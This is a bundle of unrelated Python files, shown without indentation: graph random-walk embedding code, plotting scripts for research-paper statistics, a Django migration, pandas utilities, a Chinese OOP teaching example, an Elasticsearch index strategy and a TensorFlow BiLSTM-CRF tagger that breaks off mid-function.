k_max = options['k_max'] if 'k_max' in options else -1
n_comparisons = options['n_comparisons'] if 'n_comparisons' in options else -1
return Struc2VecWalker(q=options['q'], k_max=k_max, n_comp=n_comparisons)
if name == 'edge2vec':
assert 'q' in options
field = options['field'] if 'field' in options else 'weight'
return Edge2VecWalker(q=options['q'], field=field)
return None
class RandomWalker:
def generate_walks(self, graph, walk_length, num_walks):
raise NotImplementedError()
class Node2VecWalker(RandomWalker):
def __init__(self, p, q):
super(Node2VecWalker, self).__init__()
self.p = p
self.q = q
def generate_walks(self, graph, walk_length, num_walks):
walks = []
for _ in range(num_walks):
for node in graph.nodes():
t = node
v = node
walk = []
while len(walk) < walk_length:
walk.append(v)
# Compute weights for each neighbor x of v
neighbor_weights = []
for x in graph.neighbors(v):
weight = 1.0
if x == t:
weight *= (1.0 / self.p)
elif t in graph[x] or x in graph[t]:
weight *= 1.0
else:
weight *= (1.0 / self.q)
neighbor_weights.append(weight)
# Normalize the weights
s = np.sum(neighbor_weights) + SMALL_NUMBER
neighbor_weights = np.array(neighbor_weights) / s
# Move the previous pointer to the current node after the first iteration
if len(walk) > 0:
t = v
# Select the next node
if abs(1.0 - np.sum(neighbor_weights)) < 1e-3:
v = np.random.choice(list(graph.neighbors(v)), p=neighbor_weights)
walks.append(walk)
return np.array(walks)
class Struc2VecWalker(RandomWalker):
def __init__(self, q, k_max, n_comp):
super(Struc2VecWalker, self).__init__()
self.q = q
self.k_max = k_max
self.num_comparisons = n_comp
def generate_walks(self, graph, walk_length, num_walks):
# Dictionary mapping each vertex to a list of vertices which have
# similar degrees
degree_clusters = self._create_degree_clusters(graph)
# Vertices which are direct neighbors of each node
neighborhoods = {
node: {0: set([node])} for node in graph.nodes()
}
# Create degree lists for the 0th level
degree_neighborhoods = {node: {} for node in graph.nodes()}
self._add_kth_degree_neighborhood(graph, degree_neighborhoods, neighborhoods, 0)
# Initialize 0th level distances and weights
l0_dist = self._compute_distances(graph, degree_neighborhoods, degree_clusters, 0, None)
distances = [l0_dist]
l0_weights = self._compute_weights(graph, l0_dist)
weights = [l0_weights]
avg_weights = [avg_2d_array(l0_weights)]
walks = []
for _ in range(num_walks):
for node in graph.nodes():
walk = [node]
k = 0
u = node
while len(walk) < walk_length:
should_stay = np.random.random() < self.q
if should_stay:
u = np.random.choice(degree_clusters[u], p=weights[k][u])
walk.append(u)
else:
if k == 0:
k += 1
elif self.k_max != -1 and k == self.k_max:
k -= 1
else:
gamma = np.sum([int(weights[k][u][v] > avg_weights[k]) \
for v,_ in enumerate(degree_clusters[u])])
up_weight = np.log(gamma + np.e)
down_weight = 1.0
up_prob = up_weight / (up_weight + down_weight)
should_move_up = np.random.random() < up_prob
if should_move_up:
k += 1
else:
k -= 1
# Only compute a layer's weights when the layer is reached
if len(weights) <= k:
self._add_kth_neighborhood(graph, neighborhoods, k)
self._add_kth_degree_neighborhood(graph, degree_neighborhoods, neighborhoods, k)
lk_dist = self._compute_distances(graph, degree_neighborhoods,
degree_clusters, k, distances[k-1])
lk_weights = self._compute_weights(graph, lk_dist)
distances.append(lk_dist)
weights.append(lk_weights)
avg_weights.append(avg_2d_array(lk_weights))
walks.append(walk)
return np.array(walks)
def _add_kth_neighborhood(self, graph, neighborhoods, k):
for node in graph.nodes():
prev = neighborhoods[node][k-1]
neighbors = prev.copy()
for n in prev:
neighbors.update(set(graph.neighbors(n)))
neighborhoods[node][k] = neighbors
def _add_kth_degree_neighborhood(self, graph, degree_neighborhoods, neighborhoods, k):
for node in graph.nodes():
degree_neighborhoods[node][k] = compressed_degree_list(graph, neighborhoods[node][k])
return degree_neighborhoods
def _compute_distances(self, graph, degree_neighborhoods, degree_clusters, k, prev_layer_distances):
distances = []
for u in graph.nodes():
d = [self._compute_distance(u, v, i, degree_neighborhoods, k, prev_layer_distances) \
for i, v in enumerate(degree_clusters[u])]
distances.append(d)
return np.array(distances)
def _compute_distance(self, u, v, v_index, degree_neighborhoods, k, prev_layer_distances):
if u == v:
return 0.0
distance, _ = fastdtw(degree_neighborhoods[u][k], degree_neighborhoods[v][k], dist=dist)
f_k = prev_layer_distances[u][v_index] + distance if prev_layer_distances is not None else distance
return f_k
def _compute_weights(self, graph, distances):
return [self._compute_weight(distances, n) for n in graph.nodes()]
def _compute_weight(self, distances, u):
distances = np.array(distances[u])
weights = np.exp(-distances)
s = np.sum(weights)
weights = weights / s
return np.array(weights)
def _create_degree_clusters(self, graph):
degrees = [graph.degree(n) for n in graph.nodes()]
sorted_nodes = [n for _, n in sorted(zip(degrees, list(graph.nodes())))]
degree_clusters = {}
# Determine the size of cluster for each node
cluster_size = self.num_comparisons
if cluster_size == -1:
cluster_size = int(np.log(graph.number_of_nodes())) + 1
for i, n in enumerate(sorted_nodes):
if i < cluster_size:
cluster = sorted_nodes[0:cluster_size+i]
elif i >= len(sorted_nodes) - cluster_size:
cluster = sorted_nodes[i-cluster_size:]
else:
cluster = sorted_nodes[i-cluster_size:i+cluster_size]
cluster.remove(n)
degree_clusters[n] = cluster
return degree_clusters
class Edge2VecWalker(RandomWalker):
def __init__(self, q, field):
super(Edge2VecWalker, self).__init__()
self.q = q
self.field = field
def generate_walks(self, graph, walk_length, num_walks):
clusters = self._create_clusters(graph)
neighborhoods = [self._create_neighborhoods(graph, prev_level=None)]
edge_features = self._get_edge_features(graph)
distances = [self._compute_distances(graph, clusters, neighborhoods[0], edge_features, None)]
walks = []
for _ in range(num_walks):
for edge in graph.edges():
walk = [edge]
k = 0
e = edge
while len(walk) < walk_length:
should_stay = np.random.random() < self.q
if not should_stay:
should_move_up = np.random.random() < 0.5
if should_move_up or k == 0:
k += 1
else:
k -= 1
if len(neighborhoods) >= k:
kth_neighborhood = self._create_neighborhoods(graph, neighborhoods[k-1])
neighborhoods.append(kth_neighborhood)
kth_distances = self._compute_distances(graph=graph,
clusters=clusters,
neighborhoods=kth_neighborhood,
features=edge_features,
prev_layer_distances=distances[k-1])
distances.append(kth_distances)
else:
weights = neg_softmax(distances[k][e])
next_edge_index = np.random.choice(len(clusters[e]), p=weights)
e = clusters[e][next_edge_index]
walk.append(e)
walks.append(walk)
return walks
def _create_clusters(self, graph):
clusters = {}
edge_list = list(graph.edges())
for e in graph.edges():
clusters[e] = edge_list
return clusters
def _create_neighborhoods(self, graph, prev_level):
neighborhoods = {}
for e in graph.edges():
prev = prev_level[e] if prev_level != None else [e]
neighborhood = set()
for src, dest in prev:
for n in graph.neighbors(src):
neighborhood.add((src, n))
for n in graph.neighbors(dest):
neighborhood.add((dest, n))
neighborhoods[e] = neighborhood
return neighborhoods
def _get_edge_features(self, graph):
features = {}
for src, dest in graph.edges():
# Excludes the current edge
src_deg = graph.degree(src) - 1
dest_deg = graph.degree(dest) - 1
weight = graph[src][dest][self.field] if self.field in graph[src][dest] else 1
features[(src, dest)] = np.array([src_deg+dest_deg, weight])
return features
def _get_features_for_neighborhood(self, neighborhood, features):
neigh_features = [features[edge] for edge in neighborhood]
return list(sorted(neigh_features, key=lambda t: t[0]))
def _compute_distances(self, graph, clusters, neighborhoods, features, prev_layer_distances):
distances = {}
for edge in graph.edges():
edge_dist = {}
edge_features = self._get_features_for_neighborhood(neighborhoods[edge], features)
for e in clusters[edge]:
e_features = self._get_features_for_neighborhood(neighborhoods[e], features)
prev_layer_dist = prev_layer_distances[edge][e] if prev_layer_distances != None else 0
edge_dist[e] = self._compute_distance(edge_features, e_features, prev_layer_dist)
distances[edge] = edge_dist
return distances
def _compute_distance(self, nf1, nf2, prev_layer_distance):
dtw_dist = fastdtw(nf1, nf2, dist=lambda x,y: np.linalg.norm(x - y))
return prev_layer_distance + dtw_dist[0]
|
import tools
import paperInfo
import plots
import matplotlib.pyplot as plt
# -*- coding: utf-8 -*-
def allCountries(papers):
countries = tools.countries(papers)
filteredCountries = tools.filteredUE(countries,6)
print(filteredCountries)
plots.pieChart(filteredCountries,"Publications by countries")
def allFields(papers):
fields = tools.aplicationFields(papers)
filteredFields = tools.filtered(fields,5)
plots.pieChart(filteredFields,"General study fields")
def EUFields(papers):
papersByEU = tools.getPapersByEU(papers)
print("analized papers from UE: ",len(papersByEU))
EUFields = tools.aplicationFields(papersByEU)
EUfilteredFields = tools.filtered(EUFields,5)
plots.pieChart(EUfilteredFields,"EU Study fields")
def USAFields(papers):
papersByUSA = tools.getPapersByUSA(papers)
print("analized papers from USA: ",len(papersByUSA))
USAFields = tools.aplicationFields(papersByUSA)
USAfilteredFields = tools.filtered(USAFields,5)
plots.pieChart(USAfilteredFields,"USA Study fields ")
def allDataYear(papers):
year = tools.publicationYear(papers)
sortedYear = tools.sortAndFillDictionary(year)
filteredYears = tools.filteredYear(sortedYear,1999)
return filteredYears
def EUdataYear(papers):
paperByEU = tools.getPapersByEU(papers)
year = tools.publicationYear(paperByEU)
sortedYear = tools.sortAndFillDictionary(year)
filteredYears = tools.filteredYear(sortedYear,1999)
return filteredYears
def CountrydataYear(papers,country):
papersByCountry = tools.getPapersByCountry(papers,country)
year = tools.publicationYear(papersByCountry)
sortedYear = tools.sortAndFillDictionary(year)
filteredYears = tools.filteredYear(sortedYear,1999)
return filteredYears
def dataYearCombine(papers):
Alldata = allDataYear(papers)
EUdata = EUdataYear(papers)
USAdata = CountrydataYear(papers,"USA")
print(1,USAdata)
plots.barChartCom2(Alldata,EUdata,USAdata,"Comparative publications by year")
def globalMedicalData(papers):
papersByEU = tools.countries(papers)
papersByField = tools.getPapersByField(papers,"Healthcare")
print("medical papers", len(papersByField))
globalSpecialization = tools.specialization(papersByField)
globalSpecializationGrouped = tools.filtered(globalSpecialization,6)
plots.pieChart(globalSpecializationGrouped,"global healthcare specialization")
def EUMedicalData(papers):
papersByEU = tools.getPapersByEU(papers)
papersByField = tools.getPapersByField(papersByEU,"Healthcare")
print("EU medical papers", len(papersByField))
globalSpecialization = tools.specialization(papersByField)
globalSpecializationGroped = tools.filtered(globalSpecialization,5)
plots.pieChart(globalSpecializationGroped,"UE healthcare pecialization")
def USAMedicalData(papers):
papersByEU = tools.getPapersByUSA(papers)
papersByField = tools.getPapersByField(papersByEU,"Healthcare")
print("USA medical papers", len(papersByField))
globalSpecialization = tools.specialization(papersByField)
globalSpecializationGroped = tools.filtered(globalSpecialization,1)
plots.pieChart(globalSpecializationGroped,"USA healthcare specialization")
def medicalCountries(paper):
papersByField = tools.getPapersByField(paper,"Healthcare")
print("medical papers", len(papersByField))
#filteredCountries = tools.filteredUE(countries,3)
#plots.pieChart(filteredCountries,"Publications by countries")
countries = tools.countries(papersByField)
filteredCountries = tools.filteredUE(countries,1)
plots.pieChart(filteredCountries,"Publications by countries")
def technologyData(paper):
paperVR = tools.filterByTechnology(paper,"VR")
paperAR = tools.filterByTechnology(paper,"AR")
paperMR = tools.filterByTechnology(paper,"MR")
paperBoth = tools.filterByTechnology(paper,",")
plots.vennDiagram(paperVR,paperAR,paperBoth)
if __name__== "__main__":
papers = tools.importPapers("data.tsv")
plots.publicationEvolution()
#technologyData(papers)
#healthCarePapers= tools.getPapersByField(papers,"Healthcare")
#technologyData(healthCarePapers)
# for a in paperDouble:
# print(a.name, a.technology)
#allCountries(papers)
#print("general data")
#allFields(papers)
#EUFields(papers)
#USAFields(papers)
#dataYearCombine(papers)
#print("medical data")
#globalMedicalData(papers)
#EUMedicalData(papers)
#USAMedicalData(papers)
#medicalCountries(papers)
|
# Generated by Django 3.1 on 2020-09-01 19:44
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('gaz_counter', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='gazcountermodel',
name='unit_price',
field=models.DecimalField(decimal_places=2, default=1.3, max_digits=1000),
),
migrations.DeleteModel(
name='GazCounterUnitPriceModel',
),
]
|
'''
A collection of functions for DS8-Unit3-Sprint1
'''
import pandas
import numpy as np
def train_val_test_split(df, test_size=0.2, val_size=0.2):
'''
Returns three dataframes. First splits DF into initial/test
based on test_size, then splits initial into train/val based
on val_size.
df = Pandas DataFrame to split
test_size = Size (number of rows) of returned 'test' DataFrame
after split (default = 0.2)
val_size = Size (number of rows) of returned 'val' DataFrame
after split (default = 0.2)
Example: train, val, test = train_val_test_split(df = pd.DataFrame,
test_size = 0.3, val_size = 0.2)
'''
size_t = round(test_size * len(df))
test = df.sample(size_t)
initial = df.drop(test.index)
size_v = round(val_size * len(df))
val = initial.sample(size_v)
train = initial.drop(val.index)
return train, val, test
def is_null(df, sum=False):
'''
Checks and returns which items in a given dataframe are null
df = Pandas DataFrame
sum(bool) = Return the sum of nulls (True), or dataframe of nulls (False),
default=False
'''
nulls = (df != df)
if sum is True:
return nulls.sum()
return nulls
def iqr_outliers(x, constant=1.5):
'''
A function to find and remove outliers from a given list
Prints outliers and returns sorted new list without outliers
'''
a = np.array(x)
# Sort list
a.sort()
# Get third quartile
third = np.percentile(a, 75)
# Get first quartile
first = np.percentile(a, 25)
# Get interquartile range (iqr)
iqr = (third - first) * constant
# Create set of first and third quartiles
quart_set = (first - iqr, third + iqr)
# Create new list for return
new = []
for i in a.tolist():
# If item is outside of lower bound print
if i <= quart_set[0]:
print(f'{i} is a low outlier')
# If item is outside of upper bount print
elif i >= quart_set[1]:
print(f'{i} is a high outlier')
# If item is within bounds, append to list
else:
new.append(i)
print('List without outliers:')
return new
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# 什么是面向对象
#需求
# - 老妈的交通工具有两个,电动车和自行车
# - 家里离菜场共 20 公里
# - 周一的时候骑电动车去买菜,骑了 0.5 小时
# - 周二的时候骑自行车去卖菜,骑了 2 小时
# - 周三的时候骑电动车去卖菜,骑了 0.6 小时
# - 分别输出三天骑行的平均速度
# def main():
# distance = 20
# e_bicycle = '电动车'
# bicycle = '自行车'
# day1 = '周一'
# hour1 = 0.5
# speed1 = 20/hour1
# print '%s 骑 %s 平均时速 %0.2f km/h' %(day1,e_bicycle, speed1)
# day2 = '周二'
# hour2 = 2
# speed2 = 20/hour2
# print '%s 骑 %s 平均时速 %0.2f km/h' %(day2,bicycle,speed2)
# day3 = '周三'
# hour3 = 0.6
# speed3 = 20/hour3
# print '%s 骑 %s 平均时速 %0.2f km/h' %(day3, e_bicycle, speed3)
class tool():
def __init__(self, category, day, hour):
self.category = category
self.day = day
self.hour = hour
def be_drived(self, distance):
speed = distance/self.hour
print '%s 骑 %s 平均时速 %0.2f km/h '% (self.day, self.category, speed)
def main():
tool1 = tool('电动车','周一', 0.5)
# tool1.be_drived(20)
tool2 = tool('自行车', '周二', 2)
# tool2.be_drived(20)
tool3 = tool('电动车', '周三', 0.6)
# tool3.be_drived(20)
lst = [tool1, tool2, tool3]
for lst_item in lst:
lst_item.be_drived(20)
if __name__ == '__main__':
main()
|
import json
import elasticsearch8
from share import models as db
from share.search import exceptions
from share.search.index_strategy.elastic8 import Elastic8IndexStrategy
from share.search import messages
from share.util import IDObfuscator
from share.util.checksum_iris import ChecksumIri
class Sharev2Elastic8IndexStrategy(Elastic8IndexStrategy):
CURRENT_STRATEGY_CHECKSUM = ChecksumIri(
checksumalgorithm_name='sha-256',
salt='Sharev2Elastic8IndexStrategy',
hexdigest='bcaa90e8fa8a772580040a8edbedb5f727202d1fca20866948bc0eb0e935e51f',
)
# abstract method from IndexStrategy
@property
def supported_message_types(self):
return {
messages.MessageType.INDEX_SUID,
messages.MessageType.BACKFILL_SUID,
}
# abstract method from Elastic8IndexStrategy
def index_settings(self):
return {
'analysis': {
'analyzer': {
'default': {
# same as 'standard' analyzer, plus html_strip
'type': 'custom',
'tokenizer': 'standard',
'filter': ['lowercase', 'stop'],
'char_filter': ['html_strip']
},
'subject_analyzer': {
'type': 'custom',
'tokenizer': 'subject_tokenizer',
'filter': [
'lowercase',
]
},
'subject_search_analyzer': {
'type': 'custom',
'tokenizer': 'keyword',
'filter': [
'lowercase',
]
},
},
'tokenizer': {
'subject_tokenizer': {
'type': 'path_hierarchy',
'delimiter': '|',
}
}
}
}
# abstract method from Elastic8IndexStrategy
def index_mappings(self):
exact_field = {
'exact': {
'type': 'keyword',
# From Elasticsearch documentation:
# The value for ignore_above is the character count, but Lucene counts bytes.
# If you use UTF-8 text with many non-ASCII characters, you may want to set the limit to 32766 / 3 = 10922 since UTF-8 characters may occupy at most 3 bytes
'ignore_above': 10922
}
}
return {
'dynamic': False,
'properties': {
'affiliations': {'type': 'text', 'fields': exact_field},
'contributors': {'type': 'text', 'fields': exact_field},
'date': {'type': 'date', 'format': 'strict_date_optional_time'},
'date_created': {'type': 'date', 'format': 'strict_date_optional_time'},
'date_modified': {'type': 'date', 'format': 'strict_date_optional_time'},
'date_published': {'type': 'date', 'format': 'strict_date_optional_time'},
'date_updated': {'type': 'date', 'format': 'strict_date_optional_time'},
'description': {'type': 'text'},
'funders': {'type': 'text', 'fields': exact_field},
'hosts': {'type': 'text', 'fields': exact_field},
'id': {'type': 'keyword'},
'identifiers': {'type': 'text', 'fields': exact_field},
'justification': {'type': 'text'},
'language': {'type': 'keyword'},
'publishers': {'type': 'text', 'fields': exact_field},
'registration_type': {'type': 'keyword'},
'retracted': {'type': 'boolean'},
'source_config': {'type': 'keyword'},
'source_unique_id': {'type': 'keyword'},
'sources': {'type': 'keyword'},
'subjects': {'type': 'text', 'analyzer': 'subject_analyzer', 'search_analyzer': 'subject_search_analyzer'},
'subject_synonyms': {'type': 'text', 'analyzer': 'subject_analyzer', 'search_analyzer': 'subject_search_analyzer', 'copy_to': 'subjects'},
'tags': {'type': 'text', 'fields': exact_field},
'title': {'type': 'text', 'fields': exact_field},
'type': {'type': 'keyword'},
'types': {'type': 'keyword'},
'withdrawn': {'type': 'boolean'},
'osf_related_resource_types': {'type': 'object', 'dynamic': True},
'lists': {'type': 'object', 'dynamic': True},
},
'dynamic_templates': [
{'exact_field_on_lists_strings': {'path_match': 'lists.*', 'match_mapping_type': 'string', 'mapping': {'type': 'text', 'fields': exact_field}}},
]
}
# abstract method from Elastic8IndexStrategy
def build_elastic_actions(self, messages_chunk: messages.MessagesChunk):
suid_ids = set(messages_chunk.target_ids_chunk)
record_qs = db.FormattedMetadataRecord.objects.filter(
suid_id__in=suid_ids,
record_format='sharev2_elastic',
)
for record in record_qs:
suid_ids.discard(record.suid_id)
source_doc = json.loads(record.formatted_metadata)
if source_doc.pop('is_deleted', False):
yield self._build_delete_action(record.suid_id)
else:
yield self._build_index_action(record.suid_id, source_doc)
# delete any that don't have the expected FormattedMetadataRecord
for leftover_suid_id in suid_ids:
yield self._build_delete_action(leftover_suid_id)
# override Elastic8IndexStrategy
def get_doc_id(self, message_target_id):
return IDObfuscator.encode_id(message_target_id, db.SourceUniqueIdentifier)
# override Elastic8IndexStrategy
def get_message_target_id(self, doc_id):
return IDObfuscator.decode_id(doc_id)
def _build_index_action(self, target_id, source_doc):
return {
'_op_type': 'index',
'_id': self.get_doc_id(target_id),
'_source': source_doc,
}
def _build_delete_action(self, target_id):
return {
'_op_type': 'delete',
'_id': self.get_doc_id(target_id),
}
class SpecificIndex(Elastic8IndexStrategy.SpecificIndex):
# optional method from IndexStrategy.SpecificIndex
def pls_handle_query__sharev2_backcompat(self, request_body=None, request_queryparams=None) -> dict:
es8_request_body = {
**(request_body or {}),
'track_total_hits': True,
}
try:
json_response = self.index_strategy.es8_client.search(
index=self.indexname,
# NOTE: the `body` param is deprecated; remove this backcompat method by ES9
body=es8_request_body,
params=request_queryparams or {},
)
except elasticsearch8.TransportError as error:
raise exceptions.IndexStrategyError() from error # TODO: error messaging
try: # mangle response for some limited backcompat with elasticsearch5
es8_total = json_response['hits']['total']
json_response['hits']['total'] = es8_total['value']
json_response['hits']['_total'] = es8_total
except KeyError:
pass
return json_response
|
#!/cs/puls/Projects/business_c_test/env/bin/python3
# -*- coding: utf-8 -*-
import tensorflow as tf
import os, sys
import numpy as np
from tqdm import trange
sys.path.append(os.path.abspath(os.path.dirname(__file__)))
from sklearn.metrics import classification_report
from gensim.models import KeyedVectors
from gensim.test.utils import datapath, get_tmpfile
from gensim.scripts.glove2word2vec import glove2word2vec
class BiLSTM():
def __init__(self, params=None, encoded_dataset=None, raw_dataset=None, word2Idx = {}):
self.embeddings = None
self.word2Idx = word2Idx
self.charEmbeddings = None
self.char2Idx = {}
self.session = None
self.datagenerator = None
self.featureMap = {'tokens': self.tokenInput, 'casing': self.casingInput,
'character': self.charInput, 'pos': self.posInput}
# Hyperparameters for the network
defaultParams = {'epoch': 1, 'miniBatchSize': 50,
'modelSavePath': '/cs/puls/Resources/models/English',
'dropout': (0.25, 0.25),
'embedding': "/cs/puls/Resources/embeddings/Finnish/fin-word2vec-lemma-100.bin",
'classifier': 'crf',
'crf': {
'learn-mode': 'join',
'test-mode': 'marginal'
},
'LSTM-Size': (100, 100),
'casingEntries': ['PADDING', 'other', 'numeric', 'mainly_numeric', 'allLower',
'allUpper', 'mainly_allUpper', 'initialUpper', 'contains_upper',
'contains_digit'],
'posEntries': ['PADDING', 'other', 'Noun', 'Verb', 'Adj', 'Adv', 'Pron', 'Conj', 'Interj',
'Num', 'Punct', 'UNKNOWN'],
'charEntries': " 0123456789abcdefghijklmnopqrstuvwxyzäöåABCDEFGHIJKLMNOPQRSTUVWXYZÄÖÅ" + \
".,-_()[]{}!?:;#'\"/\\%$`&=*+@^~|\u2013\u2014\u201C\u201D",
'labelEntries': ['B-PER', 'B-LOC', 'B-ORG', 'B-PRO', 'B-OTH',
'I-PER', 'I-LOC', 'I-ORG', 'I-PRO', 'I-OTH', 'O'],
'character': {
'charEmbeddings': 'cnn',
'charEmbeddingsSize': 30,
'charFilterSize': 30,
'charFilterLength': 3,
'charLSTMSize': 30,
'maxCharLength': 50,
},
'casing': {
'num_units': 30,
'activation': 'relu',
'dropout': 0.2
},
'pos': {
'num_units': 30,
'activation': 'relu',
'dropout': 0.2
},
'optimizer': {
'type': 'adam',
'clipvalue': 0,
'clipnorm': 1,
},
'earlyStopping': 5,
'featureNames': ['tokens', 'casing', 'character', 'pos'],
'addFeatureDimensions': 10}
self.activation_map = {
'relu': tf.nn.relu,
'tanh': tf.nn.tanh,
'sigmoid': tf.nn.sigmoid,
'softmax': tf.nn.softmax,
}
if params != None:
for k, v in params.items():
if type(v) == dict:
for kk, vv in v.items():
defaultParams[k][kk] = vv
else:
defaultParams[k] = v
self.params = defaultParams
self.dataset = {}
if 'tokens' in self.params['featureNames'] and not len(self.word2Idx):
self.loadWordEmbedding()
elif len(self.word2Idx):
self.char2Idx = {"PADDING": 0, "UNKNOWN": 1}
self.char2Idx.update({char:i+len(self.char2Idx)
for i,char in enumerate(self.params['charEntries'])})
return
self.loadCharEmbedding()
if raw_dataset and encoded_dataset is None:
self.setRawDataset(raw_dataset)
self.buildModel()
if encoded_dataset:
self.setDataset(encoded_dataset)
self.buildModel()
def loadCharEmbedding(self):
self.char2Idx = {"PADDING": 0, "UNKNOWN": 1}
self.charEmbeddings = np.zeros(self.params['character']['charEmbeddingsSize'])
limit = np.sqrt(3.0 / self.params['character']['charEmbeddingsSize']) # Why?
self.charEmbeddings = np.vstack((self.charEmbeddings,
np.random.uniform(-limit, limit,
self.params['character']['charEmbeddingsSize'])))
for _ in self.params['charEntries']:
self.char2Idx[_] = len(self.char2Idx)
self.charEmbeddings = np.vstack((self.charEmbeddings,
np.random.uniform(-limit, limit,
self.params['character']['charEmbeddingsSize'])))
def loadWordEmbedding(self):
print('Loading Embedding Matrix...')
if 'glove' in self.params['embedding'].lower():
glove_file = datapath(self.params['embedding'])
tmp_file = get_tmpfile('glove2vec.txt')
glove2word2vec(glove_file, tmp_file)
embedding = KeyedVectors.load_word2vec_format(tmp_file, binary=False)
else:
embedding = KeyedVectors.load_word2vec_format(self.params['embedding'], binary=True)
# Add padding+unknown
self.word2Idx["PADDING_TOKEN"] = len(self.word2Idx)
self.embeddings = np.zeros(embedding.syn0.shape[1])
self.word2Idx["AMBIGUOUS_TOKEN"] = len(self.word2Idx)
self.embeddings = np.vstack((np.random.uniform(-0.25, 0.25, embedding.syn0.shape[1]), self.embeddings))
self.word2Idx["UNKNOWN_TOKEN"] = len(self.word2Idx)
self.embeddings = np.vstack((np.random.uniform(-0.25, 0.25, embedding.syn0.shape[1]), self.embeddings))
self.embeddings = np.vstack((self.embeddings, embedding.syn0))
temp = len(self.word2Idx)
self.word2Idx.update({v:k + temp for k,v in enumerate(embedding.index2word)})
def tokenInput(self, sentence_length=None):
tokens_input = tf.placeholder(tf.int32, [None, None], name='tokens_input')
W = tf.Variable(self.embeddings, trainable=False, name="W_token")
tokens = tf.nn.embedding_lookup(W, tokens_input, name='tokens')
del self.embeddings
tokens = tf.cast(tokens, tf.float64)
print('Embedding Shape:', tokens.shape)
'''
tokens_input = Input(shape=(None,), name='words_input')
tokens = Embedding(input_dim=self.embeddings.shape[0], output_dim=self.embeddings.shape[1],
weights=[self.embeddings], trainable=False, name='word_embeddings')(tokens_input)
'''
return tokens_input, tokens
def casingInput(self, sentence_length=None):
casing_input = tf.placeholder(tf.int32, [None, None],name='casing_input')
W = tf.Variable(tf.random_uniform([len(self.params['casingEntries']),
self.params['addFeatureDimensions']], -1.0, 1.0), name="W_case")
casings = tf.nn.embedding_lookup(W, casing_input, name='casings')
casings = tf.cast(casings, tf.float64)
print('Casing Shape:', casings.shape)
'''
casing_input = Input(shape=(None, ),name='casing_input')
casings = Embedding(input_dim=len(self.params['casingEntries']),
output_dim=self.params['addFeatureDimensions'], name='casings')(casing_input)
'''
return casing_input, casings
def posInput(self, sentence_length=None):
pos_input = tf.placeholder(tf.int32, [None, None, len(self.params['posEntries'])], name='pos_input')
#pos = tf.reshape(pos_input, [-1, len(self.params['posEntries'])])
pos = tf.layers.Dense(self.params['pos']['num_units'],
activation=self.activation_map[self.params['casing']['activation']],
name='pos_dense')(pos_input)
if self.params['pos'].get('dropout'):
pos = tf.layers.Dropout(self.params['pos'].get('dropout'), name='pos_dropout')(pos)
pos = tf.cast(pos, tf.float64)
print('POS Shape:', pos.shape)
'''
pos_input = Input(shape=(None, len(self.params['posEntries'])), name='pos_input')
pos = Dense(self.params['pos']['num_units'],
activation=self.params['casing']['activation'], name='pos_dense')(pos_input)
if self.params['pos'].get('dropout'):
pos = Dropout(self.params['casing'].get('dropout'), name='pos_dropout')(pos)
'''
return pos_input, pos
def charInput(self, sentence_length=None):
chars_input = tf.placeholder(tf.int32, [None, None, self.params['character']['maxCharLength']], name='chars_input')
# chars_input = Input(shape=(None, self.params['character']['maxCharLength']), name='char_input')
W = tf.Variable(tf.random_uniform([self.charEmbeddings.shape[0],
self.charEmbeddings.shape[1]], -1.0, 1.0), name="W_char")
chars = tf.nn.embedding_lookup(W, chars_input, name='char_emd')
if self.params['character']['charEmbeddings'].lower() == 'lstm':
lstm_fw_cell = tf.nn.rnn_cell.LSTMCell(self.params['character']['charLSTMSize'])
lstm_bw_cell = tf.nn.rnn_cell.LSTMCell(self.params['character']['charLSTMSize'])
(output_fw, output_bw), _ = \
tf.nn.bidirectional_dynamic_rnn(lstm_fw_cell, lstm_bw_cell, chars,dtype=tf.float32)
chars = tf.concat([output_fw, output_bw], axis=-1)
chars = tf.reshape(chars, [-1, sentence_length, self.params['character']['charLSTMSize']*2])
'''
# Use LSTM for char embeddings from Lample et al., 2016
chars = TimeDistributed(
Embedding(input_dim=self.charEmbeddings.shape[0], output_dim=self.charEmbeddings.shape[1],
weights=[self.charEmbeddings], trainable=True, mask_zero=True), name='char_emd')(chars_input)
charLSTMSize = self.params['character']['charLSTMSize']
chars = TimeDistributed(Bidirectional(LSTM(charLSTMSize, return_sequences=False)), name="char_lstm")(chars)
'''
else:
charFilterSize = self.params['character']['charFilterSize']
charFilterLength = self.params['character']['charFilterLength']
charsFilter = tf.Variable(tf.random_normal([1, charFilterLength,
self.charEmbeddings.shape[1], charFilterSize]))
chars = tf.nn.conv2d(chars, charsFilter, strides=[1, 1, 1, 1], padding='SAME', name='char_cnn')
chars = tf.reduce_max(chars, axis=-2, name="char_pooling")
'''
# Use CNNs for character embeddings from Ma and Hovy, 2016
chars = TimeDistributed(
Embedding(input_dim=self.charEmbeddings.shape[0], output_dim=self.charEmbeddings.shape[1],
weights=[self.charEmbeddings], trainable=True, mask_zero=False), name='char_emd')(chars_input)
charFilterSize = self.params['character']['charFilterSize']
charFilterLength = self.params['character']['charFilterLength']
chars = TimeDistributed(Conv1D(charFilterSize, charFilterLength, padding='same'), name="char_cnn")(chars)
chars = TimeDistributed(GlobalMaxPooling1D(), name="char_pooling")(chars)
chars = TimeDistributed(Masking(mask_value=0), name="char_mask")(chars)
'''
chars = tf.cast(chars, tf.float64)
print('CharEmbedding Shape:', chars.shape)
del self.charEmbeddings
#chars = tf.reshape(chars, [-1, tf.shape(chars_input)[-2], tf.shape(chars)[-1]])
return chars_input, chars
def buildModel(self):
tf.reset_default_graph()
label = tf.placeholder(tf.int32, [None, None], name='label')
sentence_length = tf.placeholder(tf.int32, [None], name='sentence_length')
input_nodes = [self.featureMap[_](sentence_length=sentence_length)
for _ in self.params['featureNames'] if _ in self.featureMap.keys()]
merged = tf.concat([_[1] for _ in input_nodes], axis=-1)
merged_input_shape = tf.shape(merged)
print('Feature Concatnated:', merged.shape)
cnt = 1
for size in self.params['LSTM-Size']:
lstm_fw_cell = tf.nn.rnn_cell.LSTMCell(size, name="merged_fw_lstm_"+ str(cnt))
lstm_bw_cell = tf.nn.rnn_cell.LSTMCell(size, name="merged_bw_lstm_"+ str(cnt))
if isinstance(self.params['dropout'], (list, tuple)):
lstm_fw_cell = tf.nn.rnn_cell.DropoutWrapper(lstm_fw_cell,
input_keep_prob=1 - self.params['dropout'][0],
state_keep_prob=1 - self.params['dropout'][1])
lstm_bw_cell = tf.nn.rnn_cell.DropoutWrapper(lstm_bw_cell,
input_keep_prob=1 - self.params['dropout'][0],
